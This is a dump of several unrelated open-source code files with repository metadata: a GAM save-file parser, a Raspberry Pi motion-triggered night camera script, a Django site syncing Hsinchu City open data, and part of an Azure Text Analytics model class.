'label': 'Chaotic neutral familiar' },
{ 'key': 'ce_familiar',
'type': 'RESREF',
'off': 0x0040,
'label': 'Chaotic evil familiar' },
{ 'key': 'unknown48',
'type': 'DWORD',
'off': 0x0048,
'label': 'Unknown 48' },
{ 'key': 'lg_1_familiar_cnt',
'type': 'DWORD',
'off': 0x004C,
'label': 'LG level 1 familiar count' },
{ 'key': 'lg_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0050,
'label': 'LG level 2 familiar count' },
{ 'key': 'lg_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0054,
'label': 'LG level 3 familiar count' },
{ 'key': 'lg_4_familiar_cnt',
'type': 'DWORD',
'off': 0x0058,
'label': 'LG level 4 familiar count' },
{ 'key': 'lg_5_familiar_cnt',
'type': 'DWORD',
'off': 0x005C,
'label': 'LG level 5 familiar count' },
{ 'key': 'lg_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0060,
'label': 'LG level 6 familiar count' },
{ 'key': 'lg_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0064,
'label': 'LG level 7 familiar count' },
{ 'key': 'lg_8_familiar_cnt',
'type': 'DWORD',
'off': 0x0068,
'label': 'LG level 8 familiar count' },
{ 'key': 'lg_9_familiar_cnt',
'type': 'DWORD',
'off': 0x006C,
'label': 'LG level 9 familiar count' },
{ 'key': 'ln_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0070,
'label': 'LN level 1 familiar count' },
{ 'key': 'ln_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0074,
'label': 'LN level 2 familiar count' },
{ 'key': 'ln_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0078,
'label': 'LN level 3 familiar count' },
{ 'key': 'ln_4_familiar_cnt',
'type': 'DWORD',
'off': 0x007C,
'label': 'LN level 4 familiar count' },
{ 'key': 'ln_5_familiar_cnt',
'type': 'DWORD',
'off': 0x0080,
'label': 'LN level 5 familiar count' },
{ 'key': 'ln_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0084,
'label': 'LN level 6 familiar count' },
{ 'key': 'ln_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0088,
'label': 'LN level 7 familiar count' },
{ 'key': 'ln_8_familiar_cnt',
'type': 'DWORD',
'off': 0x008C,
'label': 'LN level 8 familiar count' },
{ 'key': 'ln_9_familiar_cnt',
'type': 'DWORD',
'off': 0x0090,
'label': 'LN level 9 familiar count' },
{ 'key': 'cg_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0094,
'label': 'CG level 1 familiar count' },
{ 'key': 'cg_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0098,
'label': 'CG level 2 familiar count' },
{ 'key': 'cg_3_familiar_cnt',
'type': 'DWORD',
'off': 0x009C,
'label': 'CG level 3 familiar count' },
{ 'key': 'cg_4_familiar_cnt',
'type': 'DWORD',
'off': 0x00A0,
'label': 'CG level 4 familiar count' },
{ 'key': 'cg_5_familiar_cnt',
'type': 'DWORD',
'off': 0x00A4,
'label': 'CG level 5 familiar count' },
{ 'key': 'cg_6_familiar_cnt',
'type': 'DWORD',
'off': 0x00A8,
'label': 'CG level 6 familiar count' },
{ 'key': 'cg_7_familiar_cnt',
'type': 'DWORD',
'off': 0x00AC,
'label': 'CG level 7 familiar count' },
{ 'key': 'cg_8_familiar_cnt',
'type': 'DWORD',
'off': 0x00B0,
'label': 'CG level 8 familiar count' },
{ 'key': 'cg_9_familiar_cnt',
'type': 'DWORD',
'off': 0x00B4,
'label': 'CG level 9 familiar count' },
{ 'key': 'ng_1_familiar_cnt',
'type': 'DWORD',
'off': 0x00B8,
'label': 'NG level 1 familiar count' },
{ 'key': 'ng_2_familiar_cnt',
'type': 'DWORD',
'off': 0x00BC,
'label': 'NG level 2 familiar count' },
{ 'key': 'ng_3_familiar_cnt',
'type': 'DWORD',
'off': 0x00C0,
'label': 'NG level 3 familiar count' },
{ 'key': 'ng_4_familiar_cnt',
'type': 'DWORD',
'off': 0x00C4,
'label': 'NG level 4 familiar count' },
{ 'key': 'ng_5_familiar_cnt',
'type': 'DWORD',
'off': 0x00C8,
'label': 'NG level 5 familiar count' },
{ 'key': 'ng_6_familiar_cnt',
'type': 'DWORD',
'off': 0x00CC,
'label': 'NG level 6 familiar count' },
{ 'key': 'ng_7_familiar_cnt',
'type': 'DWORD',
'off': 0x00D0,
'label': 'NG level 7 familiar count' },
{ 'key': 'ng_8_familiar_cnt',
'type': 'DWORD',
'off': 0x00D4,
'label': 'NG level 8 familiar count' },
{ 'key': 'ng_9_familiar_cnt',
'type': 'DWORD',
'off': 0x00D8,
'label': 'NG level 9 familiar count' },
{ 'key': 'tn_1_familiar_cnt',
'type': 'DWORD',
'off': 0x00DC,
'label': 'TN level 1 familiar count' },
{ 'key': 'tn_2_familiar_cnt',
'type': 'DWORD',
'off': 0x00E0,
'label': 'TN level 2 familiar count' },
{ 'key': 'tn_3_familiar_cnt',
'type': 'DWORD',
'off': 0x00E4,
'label': 'TN level 3 familiar count' },
{ 'key': 'tn_4_familiar_cnt',
'type': 'DWORD',
'off': 0x00E8,
'label': 'TN level 4 familiar count' },
{ 'key': 'tn_5_familiar_cnt',
'type': 'DWORD',
'off': 0x00EC,
'label': 'TN level 5 familiar count' },
{ 'key': 'tn_6_familiar_cnt',
'type': 'DWORD',
'off': 0x00F0,
'label': 'TN level 6 familiar count' },
{ 'key': 'tn_7_familiar_cnt',
'type': 'DWORD',
'off': 0x00F4,
'label': 'TN level 7 familiar count' },
{ 'key': 'tn_8_familiar_cnt',
'type': 'DWORD',
'off': 0x00F8,
'label': 'TN level 8 familiar count' },
{ 'key': 'tn_9_familiar_cnt',
'type': 'DWORD',
'off': 0x00FC,
'label': 'TN level 9 familiar count' },
{ 'key': 'ne_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0100,
'label': 'NE level 1 familiar count' },
{ 'key': 'ne_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0104,
'label': 'NE level 2 familiar count' },
{ 'key': 'ne_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0108,
'label': 'NE level 3 familiar count' },
{ 'key': 'ne_4_familiar_cnt',
'type': 'DWORD',
'off': 0x010C,
'label': 'NE level 4 familiar count' },
{ 'key': 'ne_5_familiar_cnt',
'type': 'DWORD',
'off': 0x0110,
'label': 'NE level 5 familiar count' },
{ 'key': 'ne_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0114,
'label': 'NE level 6 familiar count' },
{ 'key': 'ne_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0118,
'label': 'NE level 7 familiar count' },
{ 'key': 'ne_8_familiar_cnt',
'type': 'DWORD',
'off': 0x011C,
'label': 'NE level 8 familiar count' },
{ 'key': 'ne_9_familiar_cnt',
'type': 'DWORD',
'off': 0x0120,
'label': 'NE level 9 familiar count' },
{ 'key': 'le_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0124,
'label': 'LE level 1 familiar count' },
{ 'key': 'le_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0128,
'label': 'LE level 2 familiar count' },
{ 'key': 'le_3_familiar_cnt',
'type': 'DWORD',
'off': 0x012C,
'label': 'LE level 3 familiar count' },
{ 'key': 'le_4_familiar_cnt',
'type': 'DWORD',
'off': 0x0130,
'label': 'LE level 4 familiar count' },
{ 'key': 'le_5_familiar_cnt',
'type': 'DWORD',
'off': 0x0134,
'label': 'LE level 5 familiar count' },
{ 'key': 'le_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0138,
'label': 'LE level 6 familiar count' },
{ 'key': 'le_7_familiar_cnt',
'type': 'DWORD',
'off': 0x013C,
'label': 'LE level 7 familiar count' },
{ 'key': 'le_8_familiar_cnt',
'type': 'DWORD',
'off': 0x0140,
'label': 'LE level 8 familiar count' },
{ 'key': 'le_9_familiar_cnt',
'type': 'DWORD',
'off': 0x0144,
'label': 'LE level 9 familiar count' },
{ 'key': 'cn_1_familiar_cnt',
'type': 'DWORD',
'off': 0x0148,
'label': 'CN level 1 familiar count' },
{ 'key': 'cn_2_familiar_cnt',
'type': 'DWORD',
'off': 0x014C,
'label': 'CN level 2 familiar count' },
{ 'key': 'cn_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0150,
'label': 'CN level 3 familiar count' },
{ 'key': 'cn_4_familiar_cnt',
'type': 'DWORD',
'off': 0x0154,
'label': 'CN level 4 familiar count' },
{ 'key': 'cn_5_familiar_cnt',
'type': 'DWORD',
'off': 0x0158,
'label': 'CN level 5 familiar count' },
{ 'key': 'cn_6_familiar_cnt',
'type': 'DWORD',
'off': 0x015C,
'label': 'CN level 6 familiar count' },
{ 'key': 'cn_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0160,
'label': 'CN level 7 familiar count' },
{ 'key': 'cn_8_familiar_cnt',
'type': 'DWORD',
'off': 0x0164,
'label': 'CN level 8 familiar count' },
{ 'key': 'cn_9_familiar_cnt',
'type': 'DWORD',
'off': 0x0168,
'label': 'CN level 9 familiar count' },
{ 'key': 'ce_1_familiar_cnt',
'type': 'DWORD',
'off': 0x016C,
'label': 'CE level 1 familiar count' },
{ 'key': 'ce_2_familiar_cnt',
'type': 'DWORD',
'off': 0x0170,
'label': 'CE level 2 familiar count' },
{ 'key': 'ce_3_familiar_cnt',
'type': 'DWORD',
'off': 0x0174,
'label': 'CE level 3 familiar count' },
{ 'key': 'ce_4_familiar_cnt',
'type': 'DWORD',
'off': 0x0178,
'label': 'CE level 4 familiar count' },
{ 'key': 'ce_5_familiar_cnt',
'type': 'DWORD',
'off': 0x017C,
'label': 'CE level 5 familiar count' },
{ 'key': 'ce_6_familiar_cnt',
'type': 'DWORD',
'off': 0x0180,
'label': 'CE level 6 familiar count' },
{ 'key': 'ce_7_familiar_cnt',
'type': 'DWORD',
'off': 0x0184,
'label': 'CE level 7 familiar count' },
{ 'key': 'ce_8_familiar_cnt',
'type': 'DWORD',
'off': 0x0188,
'label': 'CE level 8 familiar count' },
{ 'key': 'ce_9_familiar_cnt',
'type': 'DWORD',
'off': 0x018C,
'label': 'CE level 9 familiar count' },
)
stored_location_desc = (
{ 'key': 'area',
'type': 'RESREF',
'off': 0x0000,
'label': 'Area' },
{ 'key': 'x',
'type': 'WORD',
'off': 0x0008,
'label': 'X coordinate' },
{ 'key': 'y',
'type': 'WORD',
'off': 0x000A,
'label': 'Y coordinate' },
)
pocket_plane_location_desc = stored_location_desc
def __init__ (self):
Format.__init__ (self)
self.expect_signature = 'GAME'
self.pc_list = []
self.npc_list = []
self.global_list = []
self.journal_entry_list = []
self.stored_location_list = []
self.pocket_plane_location_list = []
def read (self, stream):
self.read_header (stream)
self.read_list (stream, 'pc')
self.read_list (stream, 'npc')
self.read_list (stream, 'global')
self.read_list (stream, 'journal_entry')
self.read_list (stream, 'stored_location')
self.read_list (stream, 'pocket_plane_location')
obj = {}
self.read_struc (stream, self.header['familiar_off'], self.familiar_info_desc, obj)
self.familiar_info = obj
# FIXME: familiar info
def update (self):
off = self.size_struc (self.header_desc)
self.header['pc_cnt'] = len (self.pc_list)
self.header['pc_off'] = off
off += self.size_struc (self.pc_desc) * len (self.pc_list)
        # FIXME: offsets for the remaining lists (npc, global, journal,
        # stored/pocket-plane locations) are not recalculated here yet
    def write (self, stream):
        # FIXME: serialization is not implemented; the original code used
        # 'off' before assignment, so fail fast instead of emitting a
        # partial file.
        raise RuntimeError ("Not implemented")
def printme (self):
self.print_header ()
self.print_list ('pc')
self.print_list ('npc')
self.print_list ('global')
self.print_list ('journal_entry')
self.print_list ('stored_location')
self.print_list ('pocket_plane_location')
self.print_struc (self.familiar_info, self.familiar_info_desc)
register_format (GAM_V22_Format, signature='GAMEV2.2', extension='GAM', name=('GAM', 'GAME'), type=0x3f5)
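# A minimal usage sketch (hypothetical file name; assumes the Format base
# class reads from whatever seekable stream type iesh uses elsewhere):
# fmt = GAM_V22_Format ()
# fmt.read (stream)  # 'stream' opened over a V2.2 BALDUR.GAM file
# fmt.printme ()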
|
gpl-2.0
| 2,371,619,244,215,804,400
| 28.877512
| 123
| 0.394818
| false
| 3.612403
| false
| false
| false
|
jmcallister47/trailcam
|
night/motion-camera.py
|
1
|
1673
|
#!/usr/bin/env python
'''Script that manages motion sensor, camera module and light
When motion is detected, turn on infrared light, take and save picture, turn off light
Maximum of one picture every 4 seconds'''
from gpiozero import MotionSensor
import subprocess
from datetime import datetime
from time import sleep
import RPi.GPIO as GPIO
def main():
sensor = MotionSensor(4)
writeToLogFile("STARTED NIGHT MODE AT " + str(datetime.now()))
GPIO.setmode(GPIO.BCM)
GPIO.setup(5, GPIO.OUT) #setup light trigger
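    # NOTE: the IR light driver is assumed to be active-low on BCM pin 5:
    # writing 0 switches it on and 1 switches it off (see turnOnLights and
    # turnOffLights below).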
while True:
if sensor.motion_detected:
turnOnLights()
print "Lights on"
sleep(1)
takePicture()
print("Take picture")
#sleep(3)
turnOffLights()
print("Turn off lights")
sleep(3)
writeToLogFile("Took one picture at " + str(datetime.now()))
'''Turns on IR Lights indefinitely'''
def turnOnLights():
GPIO.output(5, 0)
'''Turns off all lights (IR and LED)'''
def turnOffLights():
GPIO.output(5, 1)
'''Takes a picture and saves it with timestamp'''
def takePicture():
now = datetime.now()
timestamp = str(now.month).zfill(2) + "-" + str(now.day).zfill(2) + "-" + str(now.year) + "-" + \
str(now.hour).zfill(2) + ":" + str(now.minute).zfill(2) + ":" + str(now.second).zfill(2)
filename = timestamp + "-night.jpg"
subprocess.call(["sudo", "raspistill", "-o", "/home/pi/trailcam/tmp/" + filename])
def writeToLogFile(arg):
    with open("/home/pi/trailcam/night/log.txt", "a") as log_file:
        log_file.write(arg + "\n")
if __name__ == "__main__":
main()
|
gpl-3.0
| -4,917,927,044,453,764,000
| 31.803922
| 104
| 0.608488
| false
| 3.492693
| false
| false
| false
|
kaochiuan/HsinchuCityWebsite
|
HsinchuCityWebsite/HsinchuCityWebsite/app/views.py
|
1
|
19767
|
"""
Definition of views.
"""
from django.shortcuts import render
from django.http import HttpResponse
from django.http import HttpRequest
from django.template import RequestContext
from datetime import datetime
from datetime import date
from django.http.response import HttpResponse
import urllib.request
import json
import urllib
from urllib.request import Request
from app.models import TempleInfo, TempleManager, CultureActiviyInfo, CityNewsItem, AnamialHospitalReputation
from app.templateModels import *
from django.contrib.sites import requests
from django.views.decorators.csrf import csrf_protect
from django.core import serializers
from app.ReputationService import ReputationService
from django.shortcuts import redirect
def favicon_redirect(request):
return redirect('/static/app/images/favi.ico')
def home(request):
"""Renders the home page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/index.html',
context_instance = RequestContext(request,
{
'title':'首頁',
'year':datetime.now().year,
}))
def contact(request):
"""Renders the contact page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/contact.html',
context_instance = RequestContext(request,
{
'title':'Contact',
'message':'Your contact page.',
'year':datetime.now().year,
}))
def about(request):
"""Renders the about page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/about.html',
context_instance = RequestContext(request,
{
'title':'與Opendata平台同步資料',
'message':'Application data sync',
'year':datetime.now().year,
}))
def templeMaps(request):
assert isinstance(request, HttpRequest)
regions = TempleInfo.objects.getDistinctRegion()
belief = TempleInfo.objects.getDistinctReligiousBelief()
regionLst = []
beliefLst = []
for r in regions:
regionLst.append(r.locateRegion)
for b in belief:
beliefLst.append(b.religiousBelief)
regionLst = set(regionLst)
beliefLst = set(beliefLst)
return render(request,
'app/templeMaps.html',
context_instance = RequestContext(request,
{
'title':'求人不如求神',
'regions':regionLst,
'belief':beliefLst,
}))
@csrf_protect
def filterTemple(request):
assert isinstance(request, HttpRequest)
region = request.POST['region']
belief = request.POST['belief']
filterTemples = TempleInfo.objects.filterByDetail(region,belief)
data = serializers.serialize("json", filterTemples, fields=('name','masterGod','address','latitude','longitude'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "templeInfo": decoded}),
content_type="application/json")
def allMyGodsInHsinchu(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/480911dd-6eea-4f97-a7e8-334b32cc8f6b/resource/ee12c072-e8aa-4be1-8179-f1c9606198f3/download/20150304091340575.json")
try:
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
j_obj = json.loads(ur)
templeLst = []
for jsonObj in j_obj:
address = jsonObj[u"寺廟所在地"]
success, lat, lng = AddressToLatlng(address)
if success == True:
wgs84locate = latlng(lat, lng)
loc = location(address,wgs84locate)
else:
wgs84locate = latlng(0.0, 0.0)
loc = location(address,wgs84locate)
g = temple(jsonObj[u"寺廟名稱"],jsonObj[u"地區"],jsonObj[u"主祀神像"],jsonObj[u"教別"],jsonObj[u"組織型態"],loc,jsonObj[u"寺廟電話 1"],jsonObj[u"寺廟電話 2"])
templeLst.append(g)
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
return render(request,
'app/allmygods.html',
context_instance = RequestContext(request,
{
'title':'求人不如求神',
'gods':templeLst,
}))
def address_to_location(request):
    assert isinstance(request, HttpRequest)
    address = request.POST['address']
    lat = 0.0
    lng = 0.0
    try:
        success, lat, lng = AddressToLatlng(address)
if success == True:
return HttpResponse(json.dumps({"status": "OK", "lat": lat, "lng": lng}),
content_type="application/json")
else:
return HttpResponse(json.dumps({"status": "Fail", "lat": lat, "lng": lng}),
content_type="application/json")
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
return HttpResponse(json.dumps({"status": "Fail", "lat": lat, "lng": lng}),
content_type="application/json")
def AddressToLatlng(address):
encodeAddress = urllib.parse.urlencode({'address': address})
url = "https://maps.googleapis.com/maps/api/geocode/json?%s" % encodeAddress
req = Request(url)
response = urllib.request.urlopen(req).readall().decode('utf-8')
jsongeocode = json.loads(response)
longitude = 0.0
latitude = 0.0
success = False
if jsongeocode['status'] == "OK":
success = True
latitude = jsongeocode['results'][0]['geometry']['location']['lat']
longitude = jsongeocode['results'][0]['geometry']['location']['lng']
return success, latitude, longitude
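# Illustrative only (requires network access; Google throttles keyless
# geocoding requests):
#   success, lat, lng = AddressToLatlng(u"Hsinchu City, Taiwan")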
@csrf_protect
def syncTempleInfo(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/480911dd-6eea-4f97-a7e8-334b32cc8f6b/resource/ee12c072-e8aa-4be1-8179-f1c9606198f3/download/20150304091340575.json")
templeLst = []
success = False
try:
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
j_obj = json.loads(ur)
for jsonObj in j_obj:
address = jsonObj[u"寺廟所在地"]
success, lat, lng = AddressToLatlng(address)
if success == True:
wgs84locate = latlng(lat, lng)
loc = location(address,wgs84locate)
else:
wgs84locate = latlng(0.0, 0.0)
loc = location(address,wgs84locate)
g = temple(jsonObj[u"寺廟名稱"],jsonObj[u"地區"],jsonObj[u"主祀神像"],jsonObj[u"教別"],jsonObj[u"組織型態"],loc,jsonObj[u"寺廟電話 1"],jsonObj[u"寺廟電話 2"])
templeLst.append(g)
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
if len(templeLst) > 0:
# sync templeInfo to database
for item in templeLst:
filterResult = TempleInfo.objects.filter_temple(name = item.name, locateRegion = item.locateRegion, masterGod = item.mastergod)
if len(filterResult) == 0:
templeItem = TempleInfo.objects.create_temple(name=item.name, locateRegion=item.locateRegion, religiousBelief=item.religiousBelief,
masterGod=item.mastergod, address=item.location.address, latitude=item.location.latlng.lat,
longitude=item.location.latlng.lng, phone1=item.phone1, phone2=item.phone2)
elif len(filterResult) == 1 and filterResult[0].latitude == 0 and filterResult[0].longitude == 0 :
latitude = item.location.latlng.lat
longitude = item.location.latlng.lng
if latitude != 0 and longitude != 0:
filterResult[0].latitude = latitude
filterResult[0].longitude = longitude
filterResult[0].save()
return HttpResponse(json.dumps({"status": "Success"}),
content_type="application/json")
else:
return HttpResponse(json.dumps({"status": "Fail"}),
content_type = "application/json")
@csrf_protect
def syncCultureInfo(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/28f1cd76-59b9-4877-b350-b064db635eb8/resource/82c2be17-0593-429b-842b-409735a9860f/download/20151119195903997.json")
activityLst = []
success = False
try:
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
j_obj = json.loads(ur)
for jsonObj in j_obj:
address = jsonObj[u"地點地址"]
success, lat, lng = AddressToLatlng(address)
if success == True:
wgs84locate = latlng(lat, lng)
loc = location(address,wgs84locate)
else:
wgs84locate = latlng(0.0, 0.0)
loc = location(address,wgs84locate)
activity = cultureActiviy(jsonObj[u"活動主題"],jsonObj[u"起始日"],jsonObj[u"截止日"],jsonObj[u"時間"],jsonObj[u"活動名稱"],jsonObj[u"地點"],loc)
activityLst.append(activity)
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
if len(activityLst) > 0:
# sync CultureActiviyInfo to database
for item in activityLst:
filterResult = CultureActiviyInfo.objects.filter_activity(name = item.name,activityTheme = item.activityTheme, locationName = item.locationName,
address = item.location.address, startDate = item.startDate, endDate = item.endDate)
if len(filterResult) == 0:
templeItem = CultureActiviyInfo.objects.create_activity(name=item.name, activityTheme=item.activityTheme,locationName= item.locationName,
address=item.location.address, latitude=item.location.latlng.lat, longitude=item.location.latlng.lng,
startDate = item.startDate, endDate = item.endDate, activityTime = item.time)
elif len(filterResult) == 1 and filterResult[0].latitude == 0 and filterResult[0].longitude == 0 :
latitude = item.location.latlng.lat
longitude = item.location.latlng.lng
if latitude != 0 and longitude != 0:
filterResult[0].latitude = latitude
filterResult[0].longitude = longitude
filterResult[0].save()
return HttpResponse(json.dumps({"status": "Success"}),
content_type="application/json")
else:
return HttpResponse(json.dumps({"status": "Fail"}),
content_type = "application/json")
@csrf_protect
def syncReputationOfAnimalHospital(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/9055d606-9231-4e67-a8bf-2500d736962d/resource/cbefd6b2-8e1b-4348-8136-085241266c92/download/20150306111824929.json")
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
ahr = ReputationService(ur)
hos = ahr.get_animal_hospitals() # (success, address, latitude, longitude)
links = ahr.get_hospital_links(hos.keys())
data = ahr.blog_crawler(links)
rep = ahr.get_reputation(hos, data) # name: ((success, address, latitude, longitude), {'positive':score,'negative':score})
jsformat = json.dumps(rep)
repLst = []
for k, v in rep.items():
wgs84locate = latlng(v[0][2], v[0][3])
locateLatlng = location(v[0][1],wgs84locate)
repItem = hospitalReputation(k,locateLatlng,v[1]['positive'],v[1]['negative'])
repLst.append(repItem)
if len(repLst) > 0:
# sync CultureActiviyInfo to database
for item in repLst:
filterResult = AnamialHospitalReputation.objects.filter_reputation(name=item.name,address=item.location.address)
today = date.today()
if len(filterResult) == 0:
templeItem = AnamialHospitalReputation.objects.create_reputation(name=item.name,address=item.location.address,
latitude=item.location.latlng.lat,longitude=item.location.latlng.lng,
postiveScore=item.positiveReputation,negativeScore=item.negativeReputation,
dataDT=today)
elif len(filterResult) == 1:
                if filterResult[0].latitude == 0 or filterResult[0].longitude == 0:  # refresh missing stored coordinates
filterResult[0].latitude = item.location.latlng.lat
filterResult[0].longitude = item.location.latlng.lng
filterResult[0].postiveScore = item.positiveReputation
filterResult[0].negativeScore = item.negativeReputation
filterResult[0].dataDT = today
filterResult[0].save()
return HttpResponse(json.dumps({"status": "Success"}),
content_type="application/json")
@csrf_protect
def syncCityNews(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/e9443b8a-da93-46a9-b794-49aabbb815fd/resource/0f3f2cb2-2552-44bf-ba08-54dfaafda034/download/20151127133908155.json")
newsLst = []
success = False
try:
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
j_obj = json.loads(ur)
for jsonObj in j_obj:
start = TaiwanDateToStdDate(jsonObj[u"發布起始日期"])
end = TaiwanDateToStdDate(jsonObj[u"發布截止日期"])
news = cityNewes(jsonObj[u"標題"],start,end,jsonObj[u"類別"],jsonObj[u"內容"],jsonObj[u"圖片路徑(1)"])
newsLst.append(news)
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
if len(newsLst) > 0:
# sync CityNewsItem to database
for item in newsLst:
filterResult = CityNewsItem.objects.filter_news(title = item.title, type = item.type, publishDate = item.publishDate, endDate = item.endDate)
if len(filterResult) == 0:
templeItem = CityNewsItem.objects.create_news(title = item.title, type = item.type,content = item.content, publishDate = item.publishDate,
endDate = item.endDate, picturePath = item.picturePath)
elif len(filterResult) == 1 :
filterResult[0].content = item.content
filterResult[0].picturePath = item.picturePath
filterResult[0].save()
return HttpResponse(json.dumps({"status": "Success"}),
content_type="application/json")
else:
return HttpResponse(json.dumps({"status": "Fail"}),
content_type = "application/json")
def cultureActivities(request):
"""Renders the about page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/cultureActivities.html',
context_instance = RequestContext(request,
{
'title':'當月藝文活動',
'year':datetime.now().year,
}))
def cityNews(request):
"""Renders the about page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/cityNews.html',
context_instance = RequestContext(request,
{
'title':'市府新聞',
'year':datetime.now().year,
}))
def TaiwanDateToStdDate(dateStr):
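    # NOTE: despite the name, this parses plain Gregorian %Y%m%d strings such
    # as "20151127"; Minguo-era dates would need 1911 added to the year first.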
return datetime.strptime(dateStr, "%Y%m%d")
@csrf_protect
def filterCultureActivities(request):
assert isinstance(request, HttpRequest)
keyword = request.POST['keyword']
filterActivities = CultureActiviyInfo.objects.filterByKeyword(keyword)
data = serializers.serialize("json", filterActivities, fields=('name','activityTheme',
'address','latitude','longitude',
'locationName','startDate','endDate','activityTime'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "activityInfo": decoded}),
content_type="application/json")
@csrf_protect
def getTop10News(request):
assert isinstance(request, HttpRequest)
topNews = CityNewsItem.objects.TopNews()
data = serializers.serialize("json", topNews, fields=('title','type','content',
'publishDate','picturePath'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "news": decoded}),
content_type="application/json")
@csrf_protect
def searchAnimalHospitalByName(request):
assert isinstance(request, HttpRequest)
name = request.POST['name']
topRputations = AnamialHospitalReputation.objects.filterByName(name)
data = serializers.serialize("json", topRputations, fields=('name','address','latitude','longitude',
'postiveScore','negativeScore','dataDT'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "reputation": decoded}),
content_type="application/json")
@csrf_protect
def getTop10AnimalHospital(request):
assert isinstance(request, HttpRequest)
topRputations = AnamialHospitalReputation.objects.Top10Hospital()
data = serializers.serialize("json", topRputations, fields=('name','address','latitude','longitude',
'postiveScore','negativeScore','dataDT'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "reputation": decoded}),
content_type="application/json")
@csrf_protect
def getReputationOfAnimalHospital(request):
assert isinstance(request, HttpRequest)
allRputations = AnamialHospitalReputation.objects.getAll()
data = serializers.serialize("json", allRputations, fields=('name','address','latitude','longitude',
'postiveScore','negativeScore','dataDT'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "reputation": decoded}),
content_type="application/json")
def animalHospitalReputation(request):
assert isinstance(request, HttpRequest)
return render(request,
'app/animalHospitalReputation.html',
context_instance = RequestContext(request,
{
'title':'動物醫院評比',
'year':datetime.now().year,
}))
def memberPerformance(request):
"""Renders the about page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/memberPerformance.html',
context_instance = RequestContext(request,
{
'title':'議員所提地方建設建議事項',
'year':datetime.now().year,
}))
|
mit
| 9,109,989,609,018,349,000
| 41.778022
| 173
| 0.602631
| false
| 3.752989
| false
| false
| false
|
Azure/azure-sdk-for-python
|
sdk/cognitiveservices/azure-cognitiveservices-language-textanalytics/azure/cognitiveservices/language/textanalytics/models/entity_record.py
|
1
|
2689
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class EntityRecord(Model):
"""EntityRecord.
Variables are only populated by the server, and will be ignored when
sending a request.
:param name: Entity formal name.
:type name: str
:param matches: List of instances this entity appears in the text.
:type matches:
list[~azure.cognitiveservices.language.textanalytics.models.MatchRecord]
:param wikipedia_language: Wikipedia language for which the WikipediaId
and WikipediaUrl refers to.
:type wikipedia_language: str
:param wikipedia_id: Wikipedia unique identifier of the recognized entity.
:type wikipedia_id: str
:ivar wikipedia_url: URL for the entity's Wikipedia page.
:vartype wikipedia_url: str
:param bing_id: Bing unique identifier of the recognized entity. Use in
conjunction with the Bing Entity Search API to fetch additional relevant
information.
:type bing_id: str
:param type: Entity type from Named Entity Recognition model
:type type: str
:param sub_type: Entity sub type from Named Entity Recognition model
:type sub_type: str
"""
_validation = {
'wikipedia_url': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'matches': {'key': 'matches', 'type': '[MatchRecord]'},
'wikipedia_language': {'key': 'wikipediaLanguage', 'type': 'str'},
'wikipedia_id': {'key': 'wikipediaId', 'type': 'str'},
'wikipedia_url': {'key': 'wikipediaUrl', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'sub_type': {'key': 'subType', 'type': 'str'},
}
def __init__(self, **kwargs):
super(EntityRecord, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.matches = kwargs.get('matches', None)
self.wikipedia_language = kwargs.get('wikipedia_language', None)
